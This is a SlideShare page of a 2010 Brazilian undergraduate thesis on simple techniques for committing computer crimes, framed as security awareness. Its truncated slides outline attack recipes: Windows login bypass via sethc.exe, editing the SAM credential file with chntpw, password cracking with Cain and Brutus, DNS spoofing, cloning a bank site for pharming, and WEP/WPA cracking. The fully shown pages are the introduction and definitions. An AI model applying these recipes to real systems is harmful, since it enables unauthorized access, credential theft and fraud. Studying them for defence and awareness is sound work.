FACULDADE DE                                  TECNOLOGIA                                  DE SÃO CAETANO DO SUL       PEDR...
PEDRO RAMOS DE AMEIDA JUNIORTÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA                             Trabalho...
Nome: ALMEIDA, Pedro Ramos de Junior.     Título: TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA.Trabalho de Co...
DEDICATÓRIADedico este trabalho a todos que de alguma formacontribuíram para sua realização, minha mãe, àspessoas    que, ...
AGRADECIMENTOSAgradeço à minha orientadora e ProfessoraVanessa Tatiana de Brito, Prof. John Dale eProfessora Cirlei Izabel...
"Se o conhecimento pode criar problemas, não é através da ignorância que podemossolucioná-los."       Isaac Asimov.
ALMEIDA, Pedro Ramos Junior. Técnicas utilizadas para prática de crimes deinformática. Xxx folhas. Trabalho de Conclusão d...
ALMEIDA, Pedro R. J. Techniques used for computer crimes. Xxx pages. Completion ofcoursework – São Caetano do sul College ...
Lista de ilustraçõesFigura 1 Principal obstáculo para a implementação de segurança .................................. 20Fi...
Figura 29 Redirecionamento do site …................................................................................ 56Fig...
Sumário1 Introdução .........................................................................................................
4.3 Fraude em contas bancárias ...................................................................................... 57  ...
13   1 Introdução       Este estudo tem como intento descrever como alguns crimes de informática podem sercometidos por pe...
14ainda hoje é possível explorar falhas e brechas existentes desde o começo da era dainformática, possivelmente, muitos an...
15       Outro objetivo importante é discutir um conhecimento erroneamente escondido,proibido em alguns sites e, muitas ve...
162. Conceitos básicos e definições       Para melhor entender as ideias apresentadas e evitar interpretações errôneas, to...
17encontrar em alguns específicos de informática. Segundo Carlos Eduardo Morimoto,                               Existem d...
18       Hackerismo: Corrente ou doutrina que um hacker segue;       Cracker: Perito em informática que, muitas vezes, uti...
19ao valor de seus ativos e o grau de risco a que eles estão expostos. No mercado, podemosencontrar diversas soluções de s...
20       Principal obstáculo para a implementação de segurança. Figura 1.Fonte: Módulo Security Solutions (2002, p.7).  2....
21do mundo (supera a marca de 400 milhões de usuários), em sua décima sétima mudança naspolíticas de privacidade, tornou p...
22       Na imagem anterior é possível observar que, logo nos três primeiros resultados dabusca, o criminoso pode achar al...
23crime.         Outras artimanhas menos conhecidas também podem ser utilizadas para escolher um“laranja” a fim de realiza...
24de uma instituição financeira brasileira de grande porte com a imagem de uma mulher nua.Uma suposta vítima de fraude fil...
25Presidente Lula. A imagem permaneceu no site até às 21h do domingo e, posteriormente, osite ficou em manutenção (PAVARIN...
263   Técnicas e conhecimentos básicos    Popularmente conhecidas como “receitas de bolo”, algumas técnicas que necessitam...
27sistema de segurança facilmente burlado. Para exemplificar o uso da engenharia social quepode ser feito neste caso, é po...
28costumam variar pouco de computador para computador e, para acessá-las, deve-se digitaruma tecla que varia entre o F2, D...
29   3.3 Obter acesso completo a sistemas Windows protegidos por senha   A grande maioria dos sistemas operacionais (como ...
30C:WindowsSystem32, deixar dentro deste diretório o arquivo que queremos executar erenomear o novo programa para “sethc.e...
31   Na figura abaixo, o prompt de comandos foi utilizado para trocar a senha de um usuáriocom o comando “net user nome_do...
32Obter propriedade de arquivo. Figura 6-Na janela que aparecer, é preciso selecionar a aba proprietário e clicar no botão...
33   Ao clicar em “Editar”, aparecerá a tela para modificar o proprietário do arquivo. Bastaescolher o novo proprietário, ...
34   3.3.1 Senhas do Windows 95,98 e Millennium   Em versões antigas como as de 95, 98 e a Millennium, para acessar um sis...
35   3.3.3 Senhas do Windows XP, 2003, Vista e 7   No caso dos sistemas operacionais mais recentes da Microsoft, apagar ou...
36   chntpw -i media/teste/WINDOWS/system32/config/SAM   Caso não ocorra nenhum imprevisto, e o comando acima seja digitad...
37apresentadas pelo programa.   Opções para alterar senhas dos usuários. Figura 12   Como é possível visualizar na figura ...
38   Como é possível verificar no exemplo abaixo, após a mensagem de sucesso apresentadapelo aplicativo, em condições norm...
39Center com o Service Pack 2. Durante a elaboração desta monografia, este procedimentotambém foi testado nos sistemas ope...
40   A imagem abaixo ilustra as etapas realizadas para carregar os arquivos do sistema. Após arealização das etapas, serão...
41contendo uma lista de hashs já calculados (também conhecidos como Rainbow Tables)frequentemente são utilizados com o int...
42senhas com menos de oito dígitos.   Crackeando. Figura 17   O tempo de processamento que é necessário para a descoberta ...
43   De forma extremamente rápida é possível visualizar todas as senhas de e-mails de todosos usuários do computador ou to...
44   Na tela principal da segunda versão do programa “Brutus”, apenas alguns itens sãonecessários configurar para a realiz...
45   A palavra “feliznatal” foi incluída na lista de palavras e corresponde à senha do e-mail.   Quando a utilização de wo...
46   Para invadir um site e visualizar, copiar, excluir ou alterar arquivos um cracker podeutilizar esta mesma ferramenta,...
474   Técnicas que demandam conhecimentos básicos    Neste capítulo, são abordadas técnicas que, para executá-las, é neces...
48comandos específicos e condicionais, o que faz de um arquivo de processamento em lote umprograma completo. O código abai...
49clsset /p seg=Tempo para o Desligamento (em segundos):set /p msg=Digite uma mensagem de desligamento:set /p force=Forcar...
50   Os resultados obtidos com a execução do programa são similares aos da imagem aseguinte.   Screenshots do batch. Figur...
51   Na imagem abaixo, é possível verificar que a opção “Invisible application” foiselecionada, o que significa que o novo...
52realizar a tarefa. Apesar de pouco utilizado e conhecido, o aplicativo pode ser executado emversões mais recentes do Win...
53   Ao escolher a opção “Invisible application”, somente o batch será executado de forma“transparente”, ou seja, o editor...
54   Da mesma forma que a imagem da caveira foi anexada, um vírus ou um programa queregistra as imagens da tela e as tecla...
55   Após compilado, o resultado será o seguinte:   Comparação de arquivos. Figura 28   É possível verificar que o arquivo...
56   O código a seguir é um exemplo de como pode ser criado um arquivo de processamentoem lotes para manipular o arquivo “...
57   É importante ressaltar que mesmo durante o acesso ao site “Yahoo”, a barra de endereçosainda continua a mostrar o end...
58que um site original pode ser copiado e a grande quantidade de usuários que são facilmenteinduzidos a acessá-los. Depend...
59       Após o site ser copiado, foi aberto o arquivo “[bb_com_br].htm” e a página dainstituição foi exibida.       Págin...
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Próximos SlideShares
Carregando em…5
×

Pedro tcc2.2.2.f

1.245 visualizações

Publicada em

TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE
INFORMÁTICA

Publicada em: Tecnologia
0 comentários
0 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
1.245
No SlideShare
0
A partir de incorporações
0
Número de incorporações
5
Ações
Compartilhamentos
0
Downloads
34
Comentários
0
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Pedro tcc2.2.2.f

  1. 1. FACULDADE DE TECNOLOGIA DE SÃO CAETANO DO SUL PEDRO RAMOS DE ALMEIDA JUNIORTÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA SÃO CAETANO DO SUL/SÃO PAULO 2010
  2. 2. PEDRO RAMOS DE AMEIDA JUNIORTÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA Trabalho de Conclusão de Curso apresentado à Faculdade de Tecnologia de São Caetano do Sul, sob a orientação da Professora MSc Vanessa Tatiana de Brito, como requisito parcial para a obtenção do diploma de Graduação no Curso de Segurança da Informação. São Caetano do Sul / São Paulo 2010
  3. 3. Nome: ALMEIDA, Pedro Ramos de Junior. Título: TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA.Trabalho de Conclusão de Curso apresentado à Faculdade de Tecnologia de São Caetano do Sul para obtenção do diploma de Graduação. Aprovado em: Banca Examinadora Prof. Dr. ou MSc. _____________________Instituição: _______________ Julgamento: ________________Assinatura: ________________________ Prof. Dr. ou MSc. _____________________Instituição: _______________ Julgamento: _________________Assinatura: _______________________ Prof. Dr. ou MSc ______________________Instituição: _______________ Julgamento: ________________Assinatura: _________________________
  4. 4. DEDICATÓRIADedico este trabalho a todos que de alguma formacontribuíram para sua realização, minha mãe, àspessoas que, voluntariamente, divulgamconhecimentos em prol do desenvolvimentosocial e tecnológico e, principalmente, ao meuavô Domingos Manha Ramirez (em memória) porsua preocupação em tentar transmitir tudo o queaprendeu ao longo da sua vida e fazer de mimuma pessoa curiosa.
  5. 5. AGRADECIMENTOSAgradeço à minha orientadora e ProfessoraVanessa Tatiana de Brito, Prof. John Dale eProfessora Cirlei Izabel da Silva Paiva pelasorientações na elaboração do trabalho. Tambémdevo agradecimentos a Aline Ramires deAlmeida, Alan Garcia, Bruno Honorio, Ana LuizaGalhumi, Professora Maria Márcia Matos Pinto eProfessora Caroline Evangelista Lopes pelasrevisões textuais e dicas de conteúdo.
  6. 6. "Se o conhecimento pode criar problemas, não é através da ignorância que podemossolucioná-los." Isaac Asimov.
  7. 7. ALMEIDA, Pedro Ramos Junior. Técnicas utilizadas para prática de crimes deinformática. Xxx folhas. Trabalho de Conclusão de Curso – Faculdade de Tecnologia de SãoCaetano do Sul, São Caetano, 2010. Resumo Neste trabalho, são discutidas algumas das técnicas mais simples utilizadas para aprática de crimes no âmbito computacional. A metodologia adotada foi a análise de exemplospráticos de como alguns crimes são cometidos e a realização de experimentos com o objetivoabordar as falhas tecnológicas relacionadas à área de segurança de informação. Este trabalho ea adoção de tal metodologia justificam-se pela falta de consciência que muitas pessoas têmsobre a necessidade de segurança das informações. O fato é que muitos nem mesmo fazematualizações de segurança sem saber que, mesmo sem documentos importantes, o computadorpode ser utilizado remotamente para diversas finalidades. A análise dos crimes feita nestamonografia tem foco nos cometidos por pessoas que possuem conhecimento entre os níveisbásico e intermediário em informática. Dentre os crimes abordados, estão os de roubo, furto,invasão de privacidade, falsidade ideológica, sequestro e até mesmo crimes hediondos. Apesquisa utiliza-se de uma linguagem simplificada e acessível, explicando termos técnicos dedifícil entendimento para que, mesmo as pessoas que não estão acostumadas aos jargões daárea possam entender a necessidade de se proteger contra tais crimes, após descobrir com quefacilidade eles são cometidos. Os resultados obtidos pela demonstração da facilidade de secometer crimes de informática são as medidas de segurança que usuários de sistemas deinformática passarão a adotar e a conclusão de que, para se proteger, é necessário conhecer osatacantes e as técnicas de ataque.PALAVRAS-CHAVE: Crimes de informática; técnicas hacker/cracker; conscientização;segurança de informação.
  8. 8. ALMEIDA, Pedro R. J. Techniques used for computer crimes. Xxx pages. Completion ofcoursework – São Caetano do sul College of Technology, São Caetano, 2010. Abstract In this paper, are discussed some of the simplest techniques used to commit crimeswithin computing. The adopted methodology was the analysis of practical examples of howsome crimes are committed and the conducting experiments with the objective to broach thetechnological failures in the information security. This work and the adoption of such methodsare justified by the lack of awareness that some people have about the importance ofinformation security. The fact is that some people do not make security updates withoutknowing that, even without important documents, the computers can be used remotely by acracker for different purposes. The analysis of the crimes that are done in this paperwork hasfocused on those ones committed by people who do not have experience with computers andpeople who have basic knowledge. Among the crimes broached in this paper are theft,invasion of privacy, forgery, kidnapping and other crimes. The research makes use of asimplified and accessible language, explaining difficult technical terms so that even peoplewho are not accustomed to jargon can understand the necessity of protection against suchcrimes after discovering how easily they are committed. The results gotten from thedemonstration of the easiness of committing computer crimes are the security measures thatusers of computer systems will take and the conclusion that, to protect the computers systems,it is necessary to know the aggressors and the attack techniques.KEYWORDS: Computer Crimes; hacker/cracker techniques; awareness; informationsecurity.
  9. 9. Lista de ilustraçõesFigura 1 Principal obstáculo para a implementação de segurança .................................. 20Figura 2 Resultados da pesquisa para o termo "CPF: " Mario ....................................... 21Figura 3 Tela de recuperação retirada do DVD do Windows Vista.................................. 28Figura 4 Prompt de comando (cmd.exe) renomeado para “sethc.exe” ............................ 30Figura 5 Alteração da senha ................................................................................................. 31Figura 6 Obter propriedade de arquivo .............................................................................. 32Figura 7 Obter propriedade de arquivo (2) ….................................................................... 32Figura 8 Obter propriedade de arquivo (3) ........................................................................ 33Figura 9 Obtendo permissões ............................................................................................... 33Figura 10 Tela do Windows Millennium ............................................................................. 34Figura 11 Opções para alterar o sistema Windows ............................................................ 36Figura 12 Opções para alterar senhas dos usuários .......................................................... 37Figura 13 Finalização do processo de exclusão de senha ................................................... 38Figura 14 Obter arquivos “SAM” e “system” com o sistema em execução ..................... 39Figura 15 Utilização do Cain ................................................................................................ 40Figura 16 Força bruta com o Cain ...................................................................................... 41Figura 17 Crackeando .......................................................................................................... 42Figura 18 Senhas das redes sem fio já acessadas ............................................................... 43Figura 19 Brutus ................................................................................................................... 44Figura 20 Wordlist ................................................................................................................. 44Figura 21 Quebra de senha de e-mail .................................................................................. 45Figura 22 Invasão de site ...................................................................................................... 46Figura 23 Screenshots do batch ............................................................................................ 50Figura 24 Compilar batch ..................................................................................................... 51Figura 25 Executar de forma invisível …............................................................................ 53Figura 26 Incluir quaisquer arquivos ao programa …....................................................... 54Figura 27 Incluir ícone …...................................................................................................... 54Figura 28 Comparação de arquivos …................................................................................ 55
  10. 10. Figura 29 Redirecionamento do site …................................................................................ 56Figura 30 Salvar site …......................................................................................................... 58Figura 31 Página WEB completa …..................................................................................... 59Figura 32 Site falso …............................................................................................................ 59Figura 33 Anonymail …........................................................................................................ 61Figura 34 Achilles ….............................................................................................................. 64Figura 35 Configurar proxy …............................................................................................. 65Figura 36 Dados de agência e conta corrente …................................................................. 67Figura 37 Dados capturados …............................................................................................ 68Figura 38 Teclado virtual …................................................................................................. 68Figura 39 Tela de interceptação de dados do cliente …...................................................... 69Figura 40 Tela de alerta ….................................................................................................... 70Figura 41 Interfaces ….......................................................................................................... 72Figura 42 Habilitar modo monitor ….................................................................................. 73Figura 43 Airodump-ng ….................................................................................................... 73Figura 44 Salvar pacotes capturados ….............................................................................. 74Figura 45 Resultados do ataque PTW …............................................................................. 75Figura 46 Autenticação falsa …............................................................................................ 76Figura 47 Modificar o MAC …............................................................................................. 76Figura 48 Criar e enviar pacotes forjados …...................................................................... 77Figura 49 Enviando pacotes forjados ….............................................................................. 78Figura 50 Capturar dados de ponto de acesso e canal específico …................................. 79Figura 51 Verificar clientes conectados …........................................................................... 79Figura 52 Capturando handshake …................................................................................... 80Figura 53 Descobrir senha …................................................................................................ 81Figura 54 Senha encontrada …............................................................................................ 81
  11. 11. Sumário1 Introdução ........................................................................................................................... 13 1.1 Objetivos ..................................................................................................................... 142 Conceitos básicos e definições ........................................................................................... 16 2.1 Crime ........................................................................................................................... 16 2.2 Distinções entre hacker e cracker; hackerismo e crackerismo................................. 16 2.3 Firewall ........................................................................................................................ 18 2.4 “Laranja” .................................................................................................................... 18 2.5 Segurança em ambientes corporativos ..................................................................... 18 2.6 Conscientização .......................................................................................................... 19 2.7 Obtenção de dados ..................................................................................................... 20 2.8 Como os criminosos escolhem um “laranja” ........................................................... 21 2.9 Exemplos reais de crimes ........................................................................................... 23 2.9.1 Incidentes envolvendo bancos ........................................................................... 24 2.9.2 Invasões ............................................................................................................... 24 2.9.3 Sequestro ............................................................................................................. 253 Técnicas e conhecimentos básicos ..................................................................................... 26 3.1 Engenharia social ........................................................................................................ 26 3.2 Outras formas de ligar o computador ....................................................................... 27 3.3 Obter acesso completo a sistemas Windows protegidos por senha ......................... 29 3.3.1 Senhas do Windows 95,98 e Millennium .......................................................... 34 3.3.2 Senhas do Windows NT e 2000 ......................................................................... 34 3.3.3 Senhas do Windows XP, 2003, Vista e 7 ........................................................... 35 3.3.4 Descobrir senhas sem alterá-las ........................................................................ 38 3.3.4.1 Senhas armazenadas no computador ..................................................... 42 3.3.4.2 Invasão de contas de e-mail e sites por meio da senha .......................... 434 Técnicas que demandam conhecimentos básicos ............................................................ 47 4.1 Criação de um programa para fins maliciosos ........................................................ 47 4.1.2 Arquivos de processamento em lote (batch) ..................................................... 47 4.1.2.1 Como compilar um arquivo de processamento em lotes ....................... 50 4.1.3 Como um vírus pode ser anexado a outro arquivo ......................................... 51 4.2 DNS spoofing .............................................................................................................. 55
  12. 12. 4.3 Fraude em contas bancárias ...................................................................................... 57 4.3.1 Pharming ............................................................................................................. 57 4.3.2 Phishing scam e e-mail spoofing ........................................................................ 61 4.3.3 Man In The Middle (MITM) e sequestro de sessão ......................................... 63 4.4 Quebra de senhas de redes sem fio ........................................................................... 71 4.4.1 Captura de tráfego ............................................................................................. 71 4.4.2 Como quebrar senhas WEP .............................................................................. 74 4.4.2.1 Como fazer autenticação falsa e acelerar o tráfego ............................... 76 4.4.3 Descoberta de senhas WPA/WPA2 ................................................................... 78 4.5 Computadores “zumbis” ........................................................................................... 83 4.5.1 Ataque DdoS ....................................................................................................... 83 4.5.2 Outros tipos de ataques feitos por computadores “zumbis” .......................... 855 Considerações finais ........................................................................................................... 866 Referências bibliográficas ................................................................................................. 87
  13. 13. 13 1 Introdução Este estudo tem como intento descrever como alguns crimes de informática podem sercometidos por pessoas que não possuem conhecimentos avançados na área. Muito se temafirmado que é um “mito” a necessidade de aprender técnicas de ataque para poder sedefender com eficiência (RUFINO, 2002), porém, pesquisas mostram que a quantidade decrimes cometidos pela internet cresce em ritmo acelerado (CERT.BR, 2010) e levam a crerque os atuais mecanismos de segurança adotados não são eficientes ou suficientes. Segundopesquisas atuais, o principal fator responsável pelo grande número de problemas relacionadosà segurança da informação é a má utilização das tecnologias (FECOMERCIO, 2010), e umadas medidas consideradas mais eficientes no combate aos incidentes é a conscientização dosusuários (RODRIGUES, 2010). Um profissional que atua em um seguimento completamente distinto da informática,dificilmente possui conhecimentos avançados para manipular regras de firewall, configurarseu antivírus de forma eficiente, saber quais ações tomar quando ameaças são encontradas,verificar cabeçalhos de e-mails e saber quais são confiáveis, ou ainda, deduzir com destrezaem quais locais ele pode ou não clicar. Para uma pessoa que, não necessariamente precisa entender a fundo os sistemascomputacionais a fim de realizar as funções correlatas à sua profissão, como um médico,advogado, metalúrgico, ou, até mesmo, pessoas que utilizam computadores com frequência,mas não necessitam de conhecimentos avançados para desempenhar suas funções, comosecretárias ou gerentes de empresas, o estudo de meios técnicos utilizados para uma proteçãoeficiente pode causar enfado e não ser eficiente na prevenção de incidentes. Considerandocomo correta a conclusão de que é mais eficiente apontar as fragilidades nos processos do queapenas aconselhar usuários sobre boas práticas de segurança, neste trabalho são discutidosalguns crimes que podem ser cometidos com certa facilidade, incidentes que ocorrem comfrequência, mas são encobertos para não denegrir a imagem de empresas e, é feita umatentativa de demonstrar que nem sempre se deve confiar veementemente em sites que exibemmensagens dizendo serem cem por cento seguros ou em processos e programas que nãolevantam suspeitas. Devido ao rápido avanço da tecnologia, muitas das ferramentas que exploram asvulnerabilidades, técnicas de ataque e brechas de segurança aqui discutidas, certamenteficarão obsoletas com o passar do tempo e não mais poderão ser usadas. Porém, assim como
  14. 14. 14ainda hoje é possível explorar falhas e brechas existentes desde o começo da era dainformática, possivelmente, muitos anos ainda serão necessários para que este trabalho setorne totalmente desatualizado, principalmente no que diz respeito à principal brecha desegurança hoje existente: as falhas humanas. É fato que as ferramentas e técnicas utilizadas por criminosos que atuam na área deinformática evoluíram desde o surgimento dos primeiros computadores; no entanto, astécnicas de defesa também evoluíram de forma considerável. Com a utilização de boas ferramentas de proteção e configurações bem elaboradas, amaior brecha de segurança passa a ser a fraude ou erro humano. Para mitigar riscos oriundosde falhas humanas, dois fatores são de extrema importância: o treinamento e aconscientização. Com a falsa ideia que algumas pessoas têm sobre a frequência com que oscrimes de informática são cometidos e sobre o nível de conhecimento necessário para cometê-los, convencer alguém sobre a necessidade de adotar medidas de segurança, em alguns casos,torna-se um desafio. 1.1 Objetivos O objetivo principal deste trabalho é demonstrar que, para aumentar o nível desegurança de informações em ambientes domésticos ou corporativos, a divulgação de técnicasque são utilizadas para a prática de crimes de informática pode servir como uma forma dedefesa e um recurso para conscientizar pessoas sobre a necessidade de se proteger dosincidentes de informática. Até mesmo em jornais televisivos são dados conselhos de comoutilizar os computadores com mais segurança; porém, ainda há pessoas que não têm medo dese expor totalmente em sites de relacionamento interpessoal, ou mesmo fazer transaçõesbancárias em computadores cheios de vírus. Neste trabalho, a tentativa de conscientização éfeita de uma forma diferente e que pode ser muito eficiente, que é demonstrar, com exemplospráticos, como é fácil, a partir de um computador, cometer atos que podem trazer sériasconsequências para qualquer pessoa que utiliza a internet no seu cotidiano. Além de objetivarajuda no trabalho de profissionais que atuam na área de segurança de informação e queprecisam convencer as pessoas da necessidade de proteção, o conteúdo aqui expresso pode serde grande valia também para usuários domésticos que se sentem seguros somente por deixarde acessar sites de bancos ou por não possuir arquivos importantes armazenados em seuscomputadores.
  15. 15. 15 Outro objetivo importante é discutir um conhecimento erroneamente escondido,proibido em alguns sites e, muitas vezes, não transmitido nem mesmo em cursos de segurançade informação, que é o conhecimento utilizado para prática de crimes de informática.Atualmente, a divulgação de técnicas hacker/cracker é feita de uma maneira que somentepessoas interessadas no assunto, competentes administradores de redes, bons programadoresou criminosos conseguem tais informações. Em outras palavras, tal como acontece com oacesso às armas de fogo, apenas as pessoas mal intencionadas ou uma minoria de curiosos epessoas com boas intenções detêm tais informações. Não faz parte dos objetivos deste trabalho a divulgação de conhecimentos para seremutilizados a fim de prover prejuízo alheio ou cometer qualquer forma de fraude, mesmoporque, as técnicas aqui utilizadas não são destinadas a crackers ou usuários avançados, poisestes, possivelmente já possuem conhecimento de técnicas melhor elaboradas e maiseficientes.
  16. 16. 162. Conceitos básicos e definições Para melhor entender as ideias apresentadas e evitar interpretações errôneas, torna-senecessário esclarecer alguns termos e palavras que são usadas constantemente neste trabalho,não só para auxiliar pessoas de outras áreas e que não estão acostumadas com a linguagemutilizada no mundo da informática, mas também para evitar interpretações diferentes porpessoas já familiarizadas com alguns termos. 2.1 Crime Na primeira edição do dicionário Aurélio, podemos encontrar a seguinte definição paraa palavra crime: “violação culpável da lei penal; delito” (1989, p.187). Neste trabalho, étratada como crime, não só a transgressão penal ou ação antijurídica que vai contra as leisbrasileiras ou internacionais vigentes, mas também qualquer ato praticado intencionalmente eque pode trazer consequências sociais ou pessoais desastrosas ou nefastas. Um dos motivospara a adoção de tal definição é devido às leis vigentes ainda não contemplarem muitos dosatos maléficos que podem ser praticados no mundo digital. Para julgar a maioria dos crimesde informática, ainda são utilizadas leis antigas para casos novos. Por exemplo, para punircrimes como os de visualização de mensagens eletrônicas alheias, utilização de dadosincorretos para preenchimento de formulários digitais e, mediante artifício ou ardil, ludibriarpessoas pela internet para benefício próprio com prejuízo alheio, são utilizadas as leis deinvasão de privacidade, falsidade ideológica e estelionato, respectivamente. A adoção de leisespecíficas para punir crimes digitais é motivo de grande discussão, atualmente, no Brasil. 2.2 Distinções entre hacker e cracker; hackerismo e crackerismo Um equívoco frequentemente cometido por pessoas de diversas áreas não correlatas àinformática é referir-se a um cracker e utilizar o termo “hacker”. Baseando-se na origem dotermo, o hacker pode ser considerado como, dentre outras coisas, um bom programador, umexperto em eletrônica ou um bom conhecedor de sistemas computacionais. Sobre o cracker,não é frequente que haja discórdia nas definições para o termo, tornando o significado dapalavra pouco menos claro se comparado ao hacker. Ainda não é comum que definições parao termo sejam encontradas em dicionários (principalmente os brasileiros), porém, é possível
  17. 17. 17encontrar em alguns específicos de informática. Segundo Carlos Eduardo Morimoto, Existem duas definições diferentes para este termo. Na primeira, o cracker é um vândalo virtual, alguém que usa seus conhecimentos para invadir sistemas, quebrar travas e senhas, roubar dados [..] Uma segunda definição, mais branda, é alguém que quebra travas de segurança de programas e algoritmos de encriptação, seja para poder rodar jogos sem o CD-ROM, ou gerar uma chave de registro falsa para um determinado programa, quebrar as travas anti-cópia [SIC] usadas em alguns softwares, quebrar o sistema de encriptação do DVD (este último realmente importante, pois permitiu que os usuários do Linux e outros sistemas não Windows pudessem assistir DVDs). Ou seja, nesta segunda definição o Cracker é alguém na margem da lei, cujas ações ainda são ilegais, embora muitas vezes eticamente justificáveis (os usuários têm direito a fazer cópias de CDs legalmente comprados, tem [SIC] direito de assistir DVDs no Linux e assim por diante) (2002, p.134). Enfatizando as afirmações de Morimoto, é possível dizer que as definições queencontramos para o termo cracker não costumam ser muito diferentes umas das outras, vistoque, quem não conhece as diferenças entre um hacker e um cracker, como muitos jornalistasnão especializados em notícias de informática, frequentemente referem-se ao cracker eutilizam o termo “hacker”. O termo “hacker” pode ainda ser ramificado em diversas outrasterminologias como o Black hat, White hat, Phreaker, Coder e várias outras, dependendo dotipo de hacker. Tais terminologias não são utilizadas neste documento, portanto, não hánecessidade de explicá-las para o entendimento do conteúdo. No dicionário de internet e informática, de Márcia Regina Sawaya, os hackers são:“programadores tecnicamente sofisticados, que dedicam boa parte de seu tempo a conhecer,dominar e modificar programas e equipamentos.” (1999, p. 208). Há uma imensa quantidade de dicionários e sites na internet que definem estes termos,portanto, estabelecer uma definição exata é algo complexo. Segundo Morimoto, “a confusão étanta que existem casos de livros e mesmo filmes legendados, onde o termo "Cracker" ésubstituído por "Hacker" pelo tradutor, sem a menor cerimônia.”(2002, p.198). Para evitar interpretações equivocadas neste trabalho, devem ser levadas em conta asseguintes definições para quando são citadas as palavras hacker, hackerismo, cracker ecrackerismo: Hacker: Pessoa com elevado conhecimento técnico em determinada área (no casodeste trabalho, conhecimento em informática);
  18. 18. 18 Hackerismo: Corrente ou doutrina que um hacker segue; Cracker: Perito em informática que, muitas vezes, utiliza-se de seu conhecimento parapraticar ações criminosas e/ou que vão contra as leis penais; Crackerismo: Corrente ou doutrina que um cracker segue. 2.3 Firewall Esta palavra, cuja tradução literal é “parede de fogo”, será bastante utilizada no texto,portanto, seu entendimento é fundamental para a perfeita compreensão do conteúdo. O firewall pode ser um software que, após ser instalado e configurado em umcomputador, tem a função de bloquear acessos e conexões suspeitas ou previamentebloqueadas. Além de um software, um firewall pode ser um componente dedicadoexclusivamente para analisar o tráfego e controlar os acessos que são permitidos ou não. Emmédias e grandes empresas, são utilizados equipamentos cuja única função é a de firewall, oque evita a lentidão na rede e permite maior precisão no controle de acesso. A definição abaixo, além de breve e simples, permite o entendimento básico doconceito de firewall. "Programa ou componente dedicado, que protege a rede contra invasões externas eacessos não autorizados.” (MORIMOTO, 2002, p.181). 2.4 “Laranja” Não foi encontrada nenhuma outra palavra mais formal e que não tenha sentidofigurado para reproduzir fielmente o significado deste termo. Quando a palavra “laranja” é mencionada nesta pesquisa, ela tem o seguintesignificado: Indivíduo, nem sempre ingênuo, que ajuda, de forma involuntária ou não, comseu nome e/ou dados pessoais, na concretização de um crime, recebendo o ônus total ouparcial. 2.5 Segurança em ambientes corporativos O nível de segurança implantada em uma empresa deve ser diretamente proporcional
  19. 19. 19ao valor de seus ativos e o grau de risco a que eles estão expostos. No mercado, podemosencontrar diversas soluções de segurança voltadas para o ambiente corporativo queincrementam a segurança dos sistemas. Muitas vezes, tais soluções são realmente necessárias,porém, tratadas como opcionais. A maioria das técnicas apresentadas neste trabalho,consideradas técnicas de lammers ou script kiddies (iniciantes), podem ser facilmentebloqueadas com soluções simples. Dos iniciantes, geralmente, apenas uma boa configuração ésuficiente para se prevenir, o que não exige a aquisição de programas ou equipamentos. A segurança em empresas (mesmo nas pequenas) deve ser diferenciada. Para manter asegurança nas empresas, algumas medidas genéricas, básicas e importantes são: -Aquisição e atualização periódica de antivírus corporativo; -Configuração personalizada de firewall; -Atualização dos programas e sistemas operacionais da empresa; -Adoção de políticas de segurança e conscientização de funcionários. As medidas supracitadas são recomendadas a qualquer tipo e porte de empresa.Medidas adicionais, entretanto, podem e devem ser tomadas de acordo com a realidade decada empresa. Devido às técnicas avançadas e requintadas que alguns criminosos utilizam, somenteinstalar um antivírus e manter o computador atualizado não são medidas que garantam asegurança de nossas redes. 2.6 Conscientização A conscientização dos usuários domésticos e corporativos sobre a necessidade detomar medidas que garantam a segurança dos sistemas é, indubitavelmente, o maior desafioencontrado para garantir a integridade, confidencialidade e disponibilidade de informações.Tal afirmação pode ser comprovada com dados de diversas pesquisas, como a Décimapesquisa nacional de segurança de informação feita pela empresa de segurança “MóduloSecurity Solutions”. Na figura abaixo, extraída desta pesquisa, é possível verificar os dados deaproximadamente 600 questionários presenciais e on-line, nos quais foram ouvidosprofissionais da área de tecnologia e segurança de informação, distribuídos pelos diversossetores da economia. Os dados correspondem à metade das mil maiores empresas brasileiras.
